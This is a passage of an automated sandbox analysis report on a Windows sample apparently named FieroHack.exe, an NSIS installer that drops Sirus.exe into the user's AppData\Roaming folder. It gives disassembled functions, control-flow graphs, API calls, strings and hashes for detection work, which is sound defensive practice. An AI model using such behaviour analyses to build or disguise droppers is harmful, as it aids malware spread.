                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                    • String ID: "$"C:\Users\user\Desktop\FieroHack.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\Desktop$C:\Users\user\Desktop\FieroHack.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                    • API String ID: 2959975522-945350059
                                                    • Opcode ID: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                    • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                    • Opcode Fuzzy Hash: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                    • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                    Function 0040390A Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215stringregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 132 40390a-403922 call 406500 135 403924-40392f GetUserDefaultUILanguage call 406055 132->135 136 403936-403967 call 405fde 132->136 140 403934 135->140 141 403969-40397a call 405fde 136->141 142 40397f-403985 lstrcatA 136->142 143 40398a-4039b3 call 403bcf call 405b7d 140->143 141->142 142->143 149 4039b9-4039be 143->149 150 403a3a-403a42 call 405b7d 143->150 149->150 151 4039c0-4039e4 call 405fde 149->151 156 403a50-403a75 LoadImageA 150->156 157 403a44-403a4b call 40618a 150->157 151->150 160 4039e6-4039e8 151->160 158 403af6-403afe call 40140b 156->158 159 403a77-403aa7 RegisterClassA 156->159 157->156 174 403b00-403b03 158->174 175 403b08-403b13 call 403bcf 158->175 162 403bc5 159->162 163 403aad-403af1 SystemParametersInfoA CreateWindowExA 159->163 165 4039f9-403a05 lstrlenA 160->165 166 4039ea-4039f7 call 405aba 160->166 167 403bc7-403bce 162->167 163->158 168 403a07-403a15 lstrcmpiA 165->168 169 403a2d-403a35 call 405a8f call 4060f7 165->169 166->165 168->169 173 403a17-403a21 GetFileAttributesA 168->173 169->150 177 403a23-403a25 173->177 178 403a27-403a28 call 405ad6 173->178 174->167 184 403b19-403b33 ShowWindow call 406492 175->184 185 403b9c-403ba4 call 4052f0 175->185 177->169 177->178 178->169 192 403b35-403b3a call 406492 184->192 193 403b3f-403b51 GetClassInfoA 184->193 190 403ba6-403bac 185->190 191 403bbe-403bc0 call 40140b 185->191 190->174 196 403bb2-403bb9 call 40140b 190->196 191->162 192->193 194 403b53-403b63 GetClassInfoA RegisterClassA 193->194 195 403b69-403b9a DialogBoxParamA call 40140b call 40385a 193->195 194->195 195->167 196->174
                                                    APIs
                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403924
                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                    • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403985
                                                    • lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                    • GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403A61
                                                    • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                    • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                    • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                    • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                    • API String ID: 606308-2167519419
                                                    • Opcode ID: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                    • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                    • Opcode Fuzzy Hash: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                    • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                    Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 205 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 208 402ef1-402ef6 205->208 209 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 205->209 210 4030d1-4030d5 208->210 217 403014-403022 call 402e3d 209->217 218 402f2f 209->218 224 403024-403027 217->224 225 403077-40307c 217->225 220 402f34-402f4b 218->220 222 402f4d 220->222 223 402f4f-402f58 call 4032ea 220->223 222->223 230 40307e-403086 call 402e3d 223->230 231 402f5e-402f65 223->231 228 403029-403041 call 403300 call 4032ea 224->228 229 40304b-403075 GlobalAlloc call 403300 call 4030d8 224->229 225->210 228->225 252 403043-403049 228->252 229->225 256 403088-403099 229->256 230->225 234 402fe1-402fe5 231->234 235 402f67-402f7b call 405c4b 231->235 242 402fe7-402fee call 402e3d 234->242 243 402fef-402ff5 234->243 235->243 254 402f7d-402f84 235->254 242->243 247 403004-40300c 243->247 248 402ff7-403001 call 4065b7 243->248 247->220 255 403012 247->255 248->247 252->225 252->229 254->243 258 402f86-402f8d 254->258 255->217 259 4030a1-4030a6 256->259 260 40309b 256->260 258->243 261 402f8f-402f96 258->261 262 4030a7-4030ad 259->262 260->259 261->243 263 402f98-402f9f 261->263 262->262 264 4030af-4030ca SetFilePointer call 405c4b 262->264 263->243 266 402fa1-402fc1 263->266 267 4030cf 264->267 266->225 268 402fc7-402fcb 266->268 267->210 269 402fd3-402fdb 268->269 270 402fcd-402fd1 268->270 269->243 271 402fdd-402fdf 269->271 270->255 270->269 271->243
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FieroHack.exe,00000400), ref: 00402ECE
                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00402F1A
                                                    • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FieroHack.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                    • API String ID: 2803837635-3992978580
                                                    • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                    • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                    • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                    • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                    Function 0040618A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 272 40618a-406195 273 406197-4061a6 272->273 274 4061a8-4061be 272->274 273->274 275 4061c4-4061cf 274->275 276 4063af-4063b3 274->276 275->276 277 4061d5-4061dc 275->277 278 4061e1-4061eb 276->278 279 4063b9-4063c3 276->279 277->276 278->279 280 4061f1-4061f8 278->280 281 4063c5-4063c9 call 4060f7 279->281 282 4063ce-4063cf 279->282 283 4063a2 280->283 284 4061fe-406232 280->284 281->282 286 4063a4-4063aa 283->286 287 4063ac-4063ae 283->287 288 406238-406242 284->288 289 40634f-406352 284->289 286->276 287->276 290 406244-406248 288->290 291 40625c 288->291 292 406382-406385 289->292 293 406354-406357 289->293 290->291 296 40624a-40624e 290->296 299 406263-40626a 291->299 294 406393-4063a0 lstrlenA 292->294 295 406387-40638e call 40618a 292->295 297 406367-406373 call 4060f7 293->297 298 406359-406365 call 406055 293->298 294->276 295->294 296->291 302 406250-406254 296->302 306 406378-40637e 297->306 298->306 304 40626c-40626e 299->304 305 40626f-406271 299->305 302->291 309 406256-40625a 302->309 304->305 307 406273-406296 call 405fde 305->307 308 4062aa-4062ad 305->308 306->294 311 406380 306->311 320 406336-40633a 307->320 321 40629c-4062a5 call 40618a 307->321 313 4062bd-4062c0 308->313 314 4062af-4062bb GetSystemDirectoryA 308->314 309->299 315 406347-40634d call 4063d2 311->315 318 4062c2-4062d0 GetWindowsDirectoryA 313->318 319 40632d-40632f 313->319 317 406331-406334 314->317 315->294 317->315 317->320 318->319 319->317 322 4062d2-4062dc 319->322 320->315 325 40633c-406342 lstrcatA 320->325 321->317 327 4062f6-40630c SHGetSpecialFolderLocation 322->327 328 4062de-4062e1 322->328 325->315 329 40632a 327->329 330 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 327->330 328->327 332 4062e3-4062ea 328->332 329->319 330->317 330->329 333 4062f2-4062f4 332->333 333->317 333->327
                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(0042E3C0,00000400), ref: 004062B5
                                                    • GetWindowsDirectoryA.KERNEL32(0042E3C0,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                    • SHGetSpecialFolderLocation.SHELL32(00405256,74DF23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                    • SHGetPathFromIDListA.SHELL32(74DF23A0,0042E3C0), ref: 00406312
                                                    • CoTaskMemFree.OLE32(74DF23A0), ref: 0040631E
                                                    • lstrcatA.KERNEL32(0042E3C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                    • lstrlenA.KERNEL32(0042E3C0,?,0042A070,00000000,00405256,0042A070,00000000,00000000,004257BA,74DF23A0), ref: 00406394
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 717251189-730719616
                                                    • Opcode ID: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                    • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                    • Opcode Fuzzy Hash: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                    • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                    Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 334 401759-40177c call 402bce call 405afc 339 401786-401798 call 4060f7 call 405a8f lstrcatA 334->339 340 40177e-401784 call 4060f7 334->340 346 40179d-4017a3 call 4063d2 339->346 340->346 350 4017a8-4017ac 346->350 351 4017ae-4017b8 call 40646b 350->351 352 4017df-4017e2 350->352 360 4017ca-4017dc 351->360 361 4017ba-4017c8 CompareFileTime 351->361 354 4017e4-4017e5 call 405c6b 352->354 355 4017ea-401806 call 405c90 352->355 354->355 362 401808-40180b 355->362 363 40187e-4018a7 call 40521e call 4030d8 355->363 360->352 361->360 364 401860-40186a call 40521e 362->364 365 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 362->365 377 4018a9-4018ad 363->377 378 4018af-4018bb SetFileTime 363->378 375 401873-401879 364->375 365->350 398 401855-401856 365->398 379 402a63 375->379 377->378 381 4018c1-4018cc FindCloseChangeNotification 377->381 378->381 382 402a65-402a69 379->382 384 4018d2-4018d5 381->384 385 402a5a-402a5d 381->385 387 4018d7-4018e8 call 40618a lstrcatA 384->387 388 4018ea-4018ed call 40618a 384->388 385->379 393 4018f2-40238c call 405813 387->393 388->393 393->382 393->385 398->375 400 401858-401859 398->400 400->364
                                                    APIs
                                                    • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 00401798
                                                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming\Sirus.exe,00000000,00000000,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 004017C2
                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                    • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\Sirus.exe
                                                    • API String ID: 1941528284-2708655863
                                                    • Opcode ID: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                    • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                    • Opcode Fuzzy Hash: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                    • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                    Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 401 406492-4064b2 GetSystemDirectoryA 402 4064b4 401->402 403 4064b6-4064b8 401->403 402->403 404 4064c8-4064ca 403->404 405 4064ba-4064c2 403->405 407 4064cb-4064fd wsprintfA LoadLibraryExA 404->407 405->404 406 4064c4-4064c6 405->406 406->407
                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                    • wsprintfA.USER32 ref: 004064E2
                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                    • String ID: %s%s.dll$UXTHEME$\
                                                    • API String ID: 2200240437-4240819195
                                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                    • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                    • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                    Function 004030D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 408 4030d8-4030ec 409 4030f5-4030fe 408->409 410 4030ee 408->410 411 403100 409->411 412 403107-40310c 409->412 410->409 411->412 413 40311c-403129 call 4032ea 412->413 414 40310e-403117 call 403300 412->414 418 4032d8 413->418 419 40312f-403133 413->419 414->413 420 4032da-4032db 418->420 421 403283-403285 419->421 422 403139-403182 GetTickCount 419->422 425 4032e3-4032e7 420->425 423 4032c5-4032c8 421->423 424 403287-40328a 421->424 426 4032e0 422->426 427 403188-403190 422->427 428 4032ca 423->428 429 4032cd-4032d6 call 4032ea 423->429 424->426 430 40328c 424->430 426->425 431 403192 427->431 432 403195-4031a3 call 4032ea 427->432 428->429 429->418 440 4032dd 429->440 434 40328f-403295 430->434 431->432 432->418 442 4031a9-4031b2 432->442 437 403297 434->437 438 403299-4032a7 call 4032ea 434->438 437->438 438->418 446 4032a9-4032b5 call 405d37 438->446 440->426 443 4031b8-4031d8 call 406625 442->443 450 40327b-40327d 443->450 451 4031de-4031f1 GetTickCount 443->451 452 4032b7-4032c1 446->452 453 40327f-403281 446->453 450->420 454 4031f3-4031fb 451->454 455 403236-403238 451->455 452->434 456 4032c3 452->456 453->420 457 403203-403233 MulDiv wsprintfA call 40521e 454->457 458 4031fd-403201 454->458 459 40323a-40323e 455->459 460 40326f-403273 455->460 456->426 457->455 458->455 458->457 463 403240-403247 call 405d37 459->463 464 403255-403260 459->464 460->427 461 403279 460->461 461->426 469 40324c-40324e 463->469 465 403263-403267 464->465 465->443 468 40326d 465->468 468->426 469->453 470 403250-403253 469->470 470->465
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CountTick$wsprintf
                                                    • String ID: ... %d%%
                                                    • API String ID: 551687249-2449383134
                                                    • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                    • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                    • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                    • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                    Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 471 405cbf-405cc9 472 405cca-405cf5 GetTickCount GetTempFileNameA 471->472 473 405d04-405d06 472->473 474 405cf7-405cf9 472->474 476 405cfe-405d01 473->476 474->472 475 405cfb 474->475 475->476
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00405CD3
                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 00405CBF
                                                    • nsa, xrefs: 00405CCA
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                    • API String ID: 1716503409-4117351048
                                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                    • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                    • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                    Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
